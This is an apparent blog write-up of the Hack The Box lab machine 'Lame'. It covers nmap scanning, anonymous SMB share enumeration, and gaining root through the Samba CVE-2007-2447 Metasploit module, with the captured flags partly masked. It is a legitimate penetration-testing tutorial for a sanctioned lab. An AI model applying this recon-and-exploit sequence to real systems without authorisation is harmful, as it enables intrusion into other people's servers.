Lame – Hack The Box

Machine: https://app.hackthebox.com/machines/Lame

Since this is the first machine for this journey, let’s that by downloading the OpenVPN configuration from HTB and creating a quick alias to connect (I will be using Kali Linux by the way, not the integrated Pwnbox):

$ echo "alias htb='sudo openvpn /home/kali/VPNs/htb.ovpn'" >> ~/.zshrc (or ~/.bashrc)

Logout / Login and then:

$ htb

Let’s start with a plain nmap:

$ nmap 10.10.10.3
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 04:22 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds
$ ping 10.10.10.3
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=22.0 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=22.6 ms
...

Which is immediately lying that the machine doesn’t respond to ping. You need to add the -Pn flag to scan a machine that doesn’t “respond to ping”:

$ nmap 10.10.10.3 -Pn
...
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

It seems the machine has SMB shares, let’s enumerate them:

$ smbclient -L 10.10.10.3
Password for [WORKGROUP\kali]: (empty)
Anonymous login successful

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk      
IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server                   Comment
---------                   -------
Workgroup            Master
---------                   -------
WORKGROUP     LAME

“oh noes!”? lol. Lame, I guess? Let’s see what we find in tmp:

$ smbclient \\10.10.10.3\tmp 130 ⨯
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Sun Jan 8 04:31:20 2023
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Sun Jan 8 04:20:46 2023
vmware-root DR 0 Sun Jan 8 04:21:13 2023
.X11-unix DH 0 Sun Jan 8 04:21:12 2023
.X0-lock HR 11 Sun Jan 8 04:21:12 2023
vgauthsvclog.txt.0 R 1600 Sun Jan 8 04:20:44 2023
5574.jsvc_up R 0 Sun Jan 8 04:21:50 2023

7282168 blocks of size 1024. 5386552 blocks available

Of these files, only vgauthsvclog.txt.0 and .X0-lock are downloadable, and they contain no valuable information. None of the other shares seems to be useful either. Maybe we need to find some credentials first.

The other open services did not accept connections without credentials either. However, I noticed generally outdated software running. Let’s do a deeper scan and see if there is a vulnerability we can find:

$ sudo nmap -Pn -script vuln,default -p21,22,139,445 -sV -O 10.10.10.3

It turns out Samba 3.0.20-Debian is vulnerable to CVE-2007-2447. Use the Metasploit framework and apply the multi/samba/usermap_script module:

whoami
root
cat /root/root.txt
c3a***************************************
cat /home/makis/user.txt
e14***************************************

There are a few more interesting paths on this machine. My guess is there is more than one way to the flags, but I will leave this up to you to explore!

So what did we learn from this machine? Sometimes a host is so open you don’t know where to start =).

PS: Γεια σου Μάκη!